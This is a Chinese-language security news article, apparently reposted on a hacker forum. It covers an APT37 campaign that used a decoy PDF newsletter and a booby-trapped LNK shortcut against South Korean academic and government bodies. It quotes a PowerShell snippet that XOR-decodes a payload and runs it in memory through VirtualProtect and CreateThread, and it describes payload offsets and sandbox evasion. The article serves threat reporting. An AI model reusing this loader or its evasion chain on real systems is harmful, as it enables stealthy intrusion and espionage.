攻击者开始利用看似无害的 PDF 通讯稿,搭配恶意的 Windows 快捷方式(LNK 文件),入侵企业环境。
该攻击于 2025 年 8 月末出现,以名为 “국가정보연구회 소식지 (52호)”(韩国国家情报研究会通讯稿第 52 期)的合法 PDF 通讯稿为伪装,主要针对韩国的学术机构和政府部门。
受害者会收到一个压缩包,其中既包含作为诱饵的 PDF 文件,也包含一个伪装成通讯稿的配套.lnk文件。当用户执行该快捷方式时,LNK 文件中嵌入的多阶段 PowerShell 加载器会在内存中完成所有解压和后续有效载荷部署操作,全程不写入磁盘,从而规避基于磁盘的检测机制。
初步分析显示,该 LNK 文件在特定偏移位置隐藏了三个二进制有效载荷:偏移量0x0000102C处为诱饵 PDF,0x0007EDC1处为加载器二进制文件,0x0015AED2处为最终可执行文件。
执行 LNK 文件后,其内部的 PowerShell 单行命令会读取这些偏移位置的数据,将二进制文件以aio0.dat、aio1.dat和aio1+3.b+la+t的文件名写入%TEMP%(系统临时文件夹),随后启动批处理脚本aio03.bat,对加载器进行解码并运行。
Seqrite(安全公司)的分析师指出,这种 “无文件” 攻击方式能让攻击者彻底避免将最终有效载荷写入磁盘,从而绕过基于特征码的防御系统。
Seqrite 研究人员后续调查发现,最终有效载荷经单字节 XOR 密钥(0x35)解密后,会通过GlobalAlloc、VirtualProtect和CreateThread等 Windows API 调用直接注入内存。
这种 “反射型 DLL 注入” 技术能让恶意代码以隐蔽方式执行,几乎不留下取证痕迹。
对加载器二进制文件的详细逆向分析显示,其包含针对 VMware 工具的环境检测以及规避沙箱的程序 —— 这些功能会阻止恶意代码在分析环境中执行,也印证了发起此次攻击的 “APT37”(代号)威胁组织具备高度专业性。
$exePath = "$env:temp\tony31.dat"
$exeFile = Get-Content -Path $exePath -Encoding Byte
$key = 0x37
for ($i = 0; $i -lt $exeFile.Length; $i++) {
$exeFile[$i] = $exeFile[$i] -bxor $key
}
$buf = [Win32]::GlobalAlloc(0x40, $exeFile.Length)
[Win32]::VirtualProtect($buf, $exeFile.Length, 0x40, [ref]$old)
[Win32]::RtlMoveMemory($buf, $exeFile, $exeFile.Length)
[Win32]::CreateThread(0, 0, $buf, 0, 0, [ref]$null)
当用户双击具有欺骗性的.lnk文件时,感染流程随即启动 —— 该操作会在后台触发 PowerShell。
PowerShell 脚本通过Get-Item和ReadAllBytes命令解析自身的二进制内容,提取出诱饵 PDF 并展示给用户,同时暗中准备真实的恶意有效载荷。
有效载荷准备就绪后,批处理加载器会对存储在aio02.dat中的 UTF-8 解码脚本执行Invoke-Expression(调用表达式)命令,该脚本随后会协调完成aio01.dat的 XOR 解密与反射注入操作。
通过利用内存执行技术,攻击者成功避开了依赖磁盘扫描的传统终端防护平台。
这种融合 “诱饵文档、嵌入式有效载荷、无文件技术” 的多层感染链,凸显出国家支持的网络间谍活动正不断升级其技术复杂度。
- LNK 文件:即 Windows 快捷方式文件,扩展名为
.lnk,用于快速指向目标文件或程序;攻击者可篡改其内容,使其执行恶意代码。
- 无文件攻击(Fileless Attack):一种不将恶意代码写入磁盘,仅在内存中完成加载、执行的攻击方式,可有效规避基于磁盘文件扫描的安全防护。
- XOR 加密:一种简单的对称加密算法,通过将数据与密钥进行 “异或” 运算实现加密,解密时使用相同密钥再次异或即可恢复原始数据。
- 反射型 DLL 注入(Reflective DLL Injection):一种恶意代码注入技术,将 DLL 文件直接加载到目标进程内存中执行,无需通过系统正常的 DLL 加载流程,隐蔽性强。
- APT37:又称 “Reaper”“Group 72”,是公认的朝鲜背景高级持续性威胁(APT)组织,长期针对韩国及其他国家的政府、学术、企业等机构开展网络间谍活动。
版权声明·<<<---红客联盟--->>>·免责声明
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
联系我们:admin@chnhonker.com
